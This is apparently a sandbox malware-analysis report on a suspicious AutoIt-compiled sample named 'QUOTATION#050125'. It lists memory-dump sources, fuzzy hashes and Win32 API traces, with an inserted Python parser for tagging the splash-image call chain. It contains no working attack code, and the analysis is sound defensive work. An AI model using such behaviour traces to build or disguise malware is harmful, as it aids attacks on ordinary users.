                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                      • Instruction ID: d18c819ce543c4553193f1225d589858fb06fe27032c3b3b226e889b80d46367
                                                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                      • Instruction Fuzzy Hash: 48020D71E012599FEF14CFA9C880AADFBF1EF48314F25416AD919F7384D731A9428B94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 899a16297d210d7e7672f3c153c609dbde63c11d9928f91f636dff1ce4b81359
                                                                                      • Instruction ID: bc2c1dedd39e8828160fc06ed10cf70aa03c8c863afefed875ba76125bb85fa9
                                                                                      • Opcode Fuzzy Hash: 899a16297d210d7e7672f3c153c609dbde63c11d9928f91f636dff1ce4b81359
                                                                                      • Instruction Fuzzy Hash: 1DD1D8722085E24ECBAD4A3B84700BABFF16B8236130D479ED4F7EA5C2ED34D954D660
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 30ca1fd8d81b0cba7fb012033828080419b2c722fd7c69da08ce72450fbada8e
                                                                                      • Instruction ID: 433662b67baf602453a4bd049faa5d086f73dbfdd06aff0391860febcfbb5e02
                                                                                      • Opcode Fuzzy Hash: 30ca1fd8d81b0cba7fb012033828080419b2c722fd7c69da08ce72450fbada8e
                                                                                      • Instruction Fuzzy Hash: 85B1D020E2AF414DD22396398C75336B65CBFBB6D5B91D71BFC2A74E62EB2186C34140
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                      • Instruction ID: 83586e4f31aa9770d4b25d885616c28e0874cee028d1af9f8970685c8eb0108f
                                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                      • Instruction Fuzzy Hash: 7091757260D0E34EDB69463B85744BEFFE15F923A131A079EE4F2EA1C1EE348954D620
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                      • Instruction ID: 037939f9f7862a6f396234533332b665b873ce0395ad2e1b55692462f9fde572
                                                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                      • Instruction Fuzzy Hash: A79178722090E34DDBAD423B857407EFFE55B923A131A07ADD4F2EB1D6EE24CA54D620
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                      • Instruction ID: 930e137f5fe05022a88224b11b57d7163c88818408e11b138ed99675d706f060
                                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                      • Instruction Fuzzy Hash: 5A9110722090E34EDBA9467B85740BEFFE15B923A131E07AED4F2EA1C1FE348554D620
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a4ed5df518b71ff1141161c4ca5776b39a58ea48c0641888a82d93f6dd532c0
                                                                                      • Instruction ID: 43e36337a6b00c3a361aec025f8c72ffa79d6bd9efd61115ee6c8d4604ec960c
                                                                                      • Opcode Fuzzy Hash: 2a4ed5df518b71ff1141161c4ca5776b39a58ea48c0641888a82d93f6dd532c0
                                                                                      • Instruction Fuzzy Hash: F5616A716087C99EDAB4992B4855BFF33D8DF81700F28492DE94EFB282D7119E42C316
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a3676d619fea96b7672b781962a8bd76f7ee755a8a224e947ea0908db589811d
                                                                                      • Instruction ID: 0175598e64e41a756dca68d92176390ebbe10a6eced97735d38570edcbc48924
                                                                                      • Opcode Fuzzy Hash: a3676d619fea96b7672b781962a8bd76f7ee755a8a224e947ea0908db589811d
                                                                                      • Instruction Fuzzy Hash: 1E61897120C7C96EDAB84A2B4C91BFE23E9DF46700F10495AE84FFB382DA129D428311
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                      • Instruction ID: 851cbf7890a22c5ec2f426a73c8a012cebcbc9b46d1f71a18e656659bbd6678b
                                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                      • Instruction Fuzzy Hash: 888150726090E34EDBAD423B85744BEFFE15B923A131A079ED4F2DA1C2EE348554E620
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                      • Instruction ID: cd2e0fe50061a532a12336db2773766df0a334dca6f9c1358059397dbfb323d0
                                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                      • Instruction Fuzzy Hash: BA41A271D1051CEBCF48CFADC991AEEBBF2AF88201F648299D516AB345D730AB41DB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5ee4ba6130d4f83a450e2360fc425a827998d09906dc4116e31f1cd4938c05e9
                                                                                      • Instruction ID: 6a96f9a6200a82dd70e9322c4ec9f8a680acdde617eb360df9d1431bad13ed2b
                                                                                      • Opcode Fuzzy Hash: 5ee4ba6130d4f83a450e2360fc425a827998d09906dc4116e31f1cd4938c05e9
                                                                                      • Instruction Fuzzy Hash: 9E21E7322216118BDB2CCF79C8236BE73E5A754320F14862EE4A7C37D0DE39A944CB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                      • Instruction ID: 9e26ba3f5a80d542a1f4a09ae4ef7dfbfe4c9d9da2f92e7c640b78dbc3acdda0
                                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                      • Instruction Fuzzy Hash: D9019D78E01209EFCB44DF98C5909AEF7F5FB58310F208699E819A7341E730AE81DB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                      • Instruction ID: 5598ae65c1e79ae0641f4fafc2f7ce1567163755062cb5ff326e7892ef642013
                                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                      • Instruction Fuzzy Hash: 24019278A01109EFCB44DF98C5909AEF7F6FF48310F208599E819A7341E730AE81DB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                      APIs
                                                                                      • DeleteObject.GDI32(00000000), ref: 00142B30
                                                                                      • DeleteObject.GDI32(00000000), ref: 00142B43
                                                                                      • DestroyWindow.USER32 ref: 00142B52
                                                                                      • GetDesktopWindow.USER32 ref: 00142B6D
                                                                                      • GetWindowRect.USER32(00000000), ref: 00142B74
                                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00142CA3
                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00142CB1
                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142CF8
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00142D04
                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00142D40
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142D62
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142D75
                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142D80
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00142D89
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142D98
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00142DA1
                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142DA8
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00142DB3
                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142DC5
                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,0015FC38,00000000), ref: 00142DDB
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00142DEB
                                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00142E11
                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00142E30
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142E52
                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0014303F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                      • API String ID: 2211948467-2373415609
                                                                                      • Opcode ID: 7363406f8dcebc8360c5071a2104ff5fb8dcd94dc4e7ec7224bdaa4fea7c5db3
                                                                                      • Instruction ID: 4de34e1fb412a2601c910401f35bf77e640deb5981bd2cc4c83d74c21d60fe5b
                                                                                      • Opcode Fuzzy Hash: 7363406f8dcebc8360c5071a2104ff5fb8dcd94dc4e7ec7224bdaa4fea7c5db3
                                                                                      • Instruction Fuzzy Hash: 52025A71900205EFDB14DF64CC89EAE7BB9FB48711F048158F915AB2A1CB70AE81CFA0
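The API trace above is the AutoIt runtime's splash-image routine as the sandbox captured it: a window of class "AutoIt v3" is created, a "static" control with SS_BITMAP style is placed inside it, an image file is read into a global memory block, wrapped in an IStream via CreateStreamOnHGlobal, decoded by OleLoadPicture, copied with CopyImage, and pushed into the control with SendMessageW(STM_SETIMAGE). The following is an added example, written for this page and not code from Joe Sandbox or from the sample: a small parser for the report's "• Api.Module(args), ref: addr" trace lines that extracts resolved string arguments (the window class names that support the "compiled AutoIt script" verdict), names a handful of standard Win32 constants at the argument positions where the trace shows them, and checks for the ordered file-to-picture-to-window chain. It assumes that captured arguments are taken in the order the report prints them and that strings contain no commas; the constant table lists only standard Win32 values, and the sample input is a subset of the lines above plus one subcall line of the kind found in the next entry.

```python
import re
from dataclasses import dataclass
from typing import Optional, Union

# Constructed sample input: lines copied from the function entry above in the
# report's own format, plus one "Part of subcall function" line as seen later on the page.
SAMPLE_TRACE = """\
• DestroyWindow.USER32 ref: 00142B52
• CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142CF8
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00142D40
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142D62
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142D80
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142D98
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142DC5
• OleLoadPicture.OLEAUT32(?,00000000,00000000,0015FC38,00000000), ref: 00142DDB
• CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00142E11
• SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00142E30
  • Part of subcall function 001573E8: GetSysColor.USER32(00000012), ref: 00157421
"""

# One trace line; the argument list is optional (see DestroyWindow above).
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Standard Win32 constants at (API, captured-argument-index) positions.
# Assumption: the captured order matches the parameter order; anything not listed stays raw.
KNOWN = {
    ("SendMessageW", 1): {0x0172: "STM_SETIMAGE"},
    ("CreateFileW", 1): {0x80000000: "GENERIC_READ"},
    ("CreateFileW", 4): {0x3: "OPEN_EXISTING"},
    ("GlobalAlloc", 0): {0x2: "GMEM_MOVEABLE"},
    ("CopyImage", 1): {0x0: "IMAGE_BITMAP"},
    ("CopyImage", 4): {0x2000: "LR_CREATEDIBSECTION"},
}

# Ordered chain left by "read file -> IStream -> OLE picture -> bitmap into a static control".
PICTURE_TO_WINDOW_CHAIN = (
    "CreateFileW", "ReadFile", "CreateStreamOnHGlobal", "OleLoadPicture",
    "SendMessageW:STM_SETIMAGE",
)

Arg = Union[int, str, None]


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int
    parent: Optional[int]  # caller address for "Part of subcall function" lines, else None


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None          # value not captured by the sandbox
    if HEX_RE.match(tok):
        return int(tok, 16)  # 32-bit stack slot
    return tok               # string the sandbox resolved (e.g. a window class name)


def parse_trace(text: str) -> list:
    """Parse trace lines into ApiCall records; lines in any other format are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(t) for t in raw.split(",")] if raw else []
        parent = int(m.group("parent"), 16) if m.group("parent") else None
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16), parent))
    return calls


def decode_args(call: ApiCall) -> list:
    """Render arguments, substituting a symbolic name where the position is in KNOWN."""
    out = []
    for i, a in enumerate(call.args):
        if a is None:
            out.append("?")
        elif isinstance(a, int):
            out.append(KNOWN.get((call.api, i), {}).get(a) or f"0x{a:08X}")
        else:
            out.append(repr(a))
    return out


def string_args(calls: list) -> list:
    """All resolved string arguments; a quick way to lift class/title strings from a trace."""
    return sorted({a for c in calls for a in c.args if isinstance(a, str)})


def _tokens(calls: list) -> list:
    """API names of top-level calls, tagging SendMessageW by decoded message id."""
    toks = []
    for c in calls:
        if c.parent is not None:
            continue  # subcall lines belong to another function's body
        tag = c.api
        if c.api == "SendMessageW" and len(c.args) > 1 and c.args[1] == 0x0172:
            tag = "SendMessageW:STM_SETIMAGE"
        toks.append(tag)
    return toks


def has_picture_to_window_chain(calls: list) -> bool:
    """True when every step of the chain appears in order; unrelated calls may sit between steps."""
    it = iter(_tokens(calls))
    return all(any(tok == step for tok in it) for step in PICTURE_TO_WINDOW_CHAIN)


if __name__ == "__main__":
    parsed = parse_trace(SAMPLE_TRACE)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.module}({', '.join(decode_args(c))})")
    print("strings:", string_args(parsed))
    print("picture-to-window chain:", has_picture_to_window_chain(parsed))
```

Run against the whole trace block of an entry, the parser keeps the report's address order, so the chain check is a cheap way to tag the splash-image routine across entries without relying on the fuzzy hashes; anything it cannot parse (the "Strings" or "Similarity" lines) is ignored rather than mis-read as a call.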
APIs
• SetTextColor.GDI32(?,00000000), ref: 0015712F
• GetSysColorBrush.USER32(0000000F), ref: 00157160
• GetSysColor.USER32(0000000F), ref: 0015716C
• SetBkColor.GDI32(?,000000FF), ref: 00157186
• SelectObject.GDI32(?,?), ref: 00157195
• InflateRect.USER32(?,000000FF,000000FF), ref: 001571C0
• GetSysColor.USER32(00000010), ref: 001571C8
• CreateSolidBrush.GDI32(00000000), ref: 001571CF
• FrameRect.USER32(?,?,00000000), ref: 001571DE
• DeleteObject.GDI32(00000000), ref: 001571E5
• InflateRect.USER32(?,000000FE,000000FE), ref: 00157230
• FillRect.USER32(?,?,?), ref: 00157262
• GetWindowLongW.USER32(?,000000F0), ref: 00157284
  • Part of subcall function 001573E8: GetSysColor.USER32(00000012), ref: 00157421
  • Part of subcall function 001573E8: SetTextColor.GDI32(?,?), ref: 00157425
  • Part of subcall function 001573E8: GetSysColorBrush.USER32(0000000F), ref: 0015743B
  • Part of subcall function 001573E8: GetSysColor.USER32(0000000F), ref: 00157446
  • Part of subcall function 001573E8: GetSysColor.USER32(00000011), ref: 00157463
  • Part of subcall function 001573E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00157471
  • Part of subcall function 001573E8: SelectObject.GDI32(?,00000000), ref: 00157482
  • Part of subcall function 001573E8: SetBkColor.GDI32(?,00000000), ref: 0015748B
  • Part of subcall function 001573E8: SelectObject.GDI32(?,?), ref: 00157498
  • Part of subcall function 001573E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001574B7
  • Part of subcall function 001573E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001574CE
  • Part of subcall function 001573E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001574DB
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
